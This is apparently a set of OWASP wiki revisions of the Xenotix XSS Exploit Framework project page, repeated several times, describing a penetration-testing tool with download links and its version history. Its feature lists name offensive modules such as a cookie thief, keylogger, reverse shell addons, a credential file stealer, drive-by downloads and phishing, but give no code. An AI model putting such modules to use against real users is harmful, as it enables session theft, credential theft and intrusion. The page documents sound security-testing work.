Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== PROJECT WEBSITE ==

*http://xenotix.in

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:ToolsWatch.png |180px | thumb | left |link=http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2014]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]

== NEWS AND EVENTS ==
* [14 Jan 2015] [http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2014, voted by ToolsWatch Readers]
* [08 Dec 2014] Xenotix XSS Exploit Framework V6.1 is Released
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Fuzzer
*POST Request Fuzzer
*Advanced Request Fuzzer
*OAuth 1.0a Request Scanner
*DOM Scanner
**DOM XSS Analyzer
**Local DOM XSS Analyzer
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
**IP to Location
**IP to GeoLocation
*Network
**Network IP (WebRTC)
**Ping Scan
**Port Scan
**Internal Network Scan
*Browser
**Fingerprinting
**Features Detector

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*JavaScript Shell
*Reverse HTTP WebShell
*Metasploit Browser Exploit
*Social Engineering
**Phisher
**Tabnabbing
**Live WebCam Screenshot
**Download Spoofer
**Geolocation HTML5 API
**Java Applet Drive-By (Windows)
**Java Applet Drive-By Reverse Shell (Windows)
**HTA Network Configuration (Windows, IE)
**HTA Drive-By (Windows, IE)
**HTA Drive-By Reverse Shell (Windows, IE)
*Firefox Addons
**Reverse TCP Shell Addon (Windows, Persistent)
**Reverse TCP Shell Addon (Linux, Persistent)
**Session Stealer Addon (Persistent)
**Keylogger Addon (Persistent)
**DDoSer Addon (Persistent)
**Linux Credential File Stealer Addon (Persistent)
**Drop and Execute Addon (Persistent)

'''AUXILIARY MODULES'''
*WebKit Developer Tools
*Encoder/Decoder
*JavaScript Encoders
**JSFuck 6 Char Encoder
**jjencode Encoder
**aaencode Encoder
*JavaScript Beautifier
*Hash Calculator
*Hash Detector
*View Injected JavaScript
*View XSS Payloads

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshNm5WRlRRTllqcG8/view Download V6.1 From GDrive]
MD5: 17c703f90dbb4f09b112284232bbb69f

====Requirements====
* Microsoft .NET Framework 4.5 http://www.microsoft.com/en-in/download/details.aspx?id=30653
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]
====Older Versions====
*Version 6 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip | MD5: 54a2335e35c47b1e5a87b163088c63ff
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Check: https://www.youtube.com/playlist?list=PLX3EwmWe0cS80ls3TsNiukQD0hfZjLHnP

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
''' WHAT'S NEW! '''
==V6.1 Changes==
* Bug Fixes
* Updated QuickPHP Server
* Local DOM XSS Analyzer
==V6 Changes==
{{#ev:youtube|RhGVuus_NJw}}
* Intelli Fuzzer
* Context Based Fuzzer
* Blind Fuzzer
* HTA Network Configuration
* HTA Drive-By
* HTA Drive-By Reverse Shell
* JSFuck 6 Char Encoder
* jjencode Encoder
* aaencode Encoder
* IP to Location
* IP to GeoLocation
* IP Hinting
* Download Spoofer
* HTML5 Geolocation API
* Reverse TCP Shell Addon (Linux)
* OAuth 1.0a Request Scanner
* 4800+ Payloads
* SSL Error Fixed

==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]

= Goodies =
== Xenotix Hoodies ==
[[Image:Xenotix_front.jpg]][[Image:Xenotix_back.jpg]]

== Purchase ==
Buy Xenotix Hoodies from Paypal [http://opensecurity.in/xenotix-hoodies/ BUY NOW]
= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Twitter Page: [https://twitter.com/Xenotix Xenotix on Twitter]
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

File:ToolsWatch.png

2015-01-15T04:57:54Z

Ajin Abraham: Ajin Abraham uploaded a new version of "File:ToolsWatch.png"

OWASP Xenotix XSS Exploit Framework

2015-01-10T05:04:21Z

Ajin Abraham: added goodies

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework==

[[Image:Xen6.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== PROJECT WEBSITE ==

*http://xenotix.in

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]

== NEWS AND EVENTS ==
* [08 Dec 2014] Xenotix XSS Exploit Framework V6.1 is Released
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Fuzzer
*POST Request Fuzzer
*Advanced Request Fuzzer
*OAuth 1.0a Request Scanner
*DOM Scanner
**DOM XSS Analyzer
**Local DOM XSS Analyzer
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
**IP to Location
**IP to GeoLocation
*Network
**Network IP (WebRTC)
**Ping Scan
**Port Scan
**Internal Network Scan
*Browser
**Fingerprinting
**Features Detector

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*JavaScript Shell
*Reverse HTTP WebShell
*Metasploit Browser Exploit
*Social Engineering
**Phisher
**Tabnabbing
**Live WebCam Screenshot
**Download Spoofer
**Geolocation HTML5 API
**Java Applet Drive-By (Windows)
**Java Applet Drive-By Reverse Shell (Windows)
**HTA Network Configuration (Windows, IE)
**HTA Drive-By (Windows, IE)
**HTA Drive-By Reverse Shell (Windows, IE)
*Firefox Addons
**Reverse TCP Shell Addon (Windows, Persistent)
**Reverse TCP Shell Addon (Linux, Persistent)
**Session Stealer Addon (Persistent)
**Keylogger Addon (Persistent)
**DDoSer Addon (Persistent)
**Linux Credential File Stealer Addon (Persistent)
**Drop and Execute Addon (Persistent)

'''AUXILIARY MODULES'''
*WebKit Developer Tools
*Encoder/Decoder
*JavaScript Encoders
**JSFuck 6 Char Encoder
**jjencode Encoder
**aaencode Encoder
*JavaScript Beautifier
*Hash Calculator
*Hash Detector
*View Injected JavaScript
*View XSS Payloads

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshNm5WRlRRTllqcG8/view Download V6.1 From GDrive]
MD5: 17c703f90dbb4f09b112284232bbb69f

====Requirements====
* Microsoft .NET Framework 4.5 http://www.microsoft.com/en-in/download/details.aspx?id=30653
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]
====Older Versions====
*Version 6 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip | MD5: 54a2335e35c47b1e5a87b163088c63ff
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Check: https://www.youtube.com/playlist?list=PLX3EwmWe0cS80ls3TsNiukQD0hfZjLHnP

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
''' WHAT'S NEW! '''
==V6.1 Changes==
* Bug Fixes
* Updated QuickPHP Server
* Local DOM XSS Analyzer
==V6 Changes==
{{#ev:youtube|RhGVuus_NJw}}
* Intelli Fuzzer
* Context Based Fuzzer
* Blind Fuzzer
* HTA Network Configuration
* HTA Drive-By
* HTA Drive-By Reverse Shell
* JSFuck 6 Char Encoder
* jjencode Encoder
* aaencode Encoder
* IP to Location
* IP to GeoLocation
* IP Hinting
* Download Spoofer
* HTML5 Geolocation API
* Reverse TCP Shell Addon (Linux)
* OAuth 1.0a Request Scanner
* 4800+ Payloads
* SSL Error Fixed

==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]

= Goodies =
== Xenotix Hoodies ==
[[Image:Xenotix_front.jpg]][[Image:Xenotix_back.jpg]]

== Purchase ==
Buy Xenotix Hoodies from Paypal [http://opensecurity.in/xenotix-hoodies/ BUY NOW]
= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Twitter Page: [https://twitter.com/Xenotix Xenotix on Twitter]
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

File:Xenotix back.jpg

2015-01-10T04:59:45Z

Ajin Abraham:

File:Xenotix front.jpg

2015-01-10T04:59:28Z

Ajin Abraham:

OWASP Xenotix XSS Exploit Framework

2014-12-08T12:03:31Z

Ajin Abraham:

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework==

[[Image:Xen6.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== PROJECT WEBSITE ==

*http://xenotix.in

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]

== NEWS AND EVENTS ==
* [08 Dec 2014] Xenotix XSS Exploit Framework V6.1 is Released
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Fuzzer
*POST Request Fuzzer
*Advanced Request Fuzzer
*OAuth 1.0a Request Scanner
*DOM Scanner
**DOM XSS Analyzer
**Local DOM XSS Analyzer
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
**IP to Location
**IP to GeoLocation
*Network
**Network IP (WebRTC)
**Ping Scan
**Port Scan
**Internal Network Scan
*Browser
**Fingerprinting
**Features Detector

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*JavaScript Shell
*Reverse HTTP WebShell
*Metasploit Browser Exploit
*Social Engineering
**Phisher
**Tabnabbing
**Live WebCam Screenshot
**Download Spoofer
**Geolocation HTML5 API
**Java Applet Drive-By (Windows)
**Java Applet Drive-By Reverse Shell (Windows)
**HTA Network Configuration (Windows, IE)
**HTA Drive-By (Windows, IE)
**HTA Drive-By Reverse Shell (Windows, IE)
*Firefox Addons
**Reverse TCP Shell Addon (Windows, Persistent)
**Reverse TCP Shell Addon (Linux, Persistent)
**Session Stealer Addon (Persistent)
**Keylogger Addon (Persistent)
**DDoSer Addon (Persistent)
**Linux Credential File Stealer Addon (Persistent)
**Drop and Execute Addon (Persistent)

'''AUXILIARY MODULES'''
*WebKit Developer Tools
*Encoder/Decoder
*JavaScript Encoders
**JSFuck 6 Char Encoder
**jjencode Encoder
**aaencode Encoder
*JavaScript Beautifier
*Hash Calculator
*Hash Detector
*View Injected JavaScript
*View XSS Payloads

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshNm5WRlRRTllqcG8/view Download V6.1 From GDrive]
MD5: 17c703f90dbb4f09b112284232bbb69f

====Requirements====
* Microsoft .NET Framework 4.5 http://www.microsoft.com/en-in/download/details.aspx?id=30653
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]
====Older Versions====
*Version 6 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip | MD5: 54a2335e35c47b1e5a87b163088c63ff
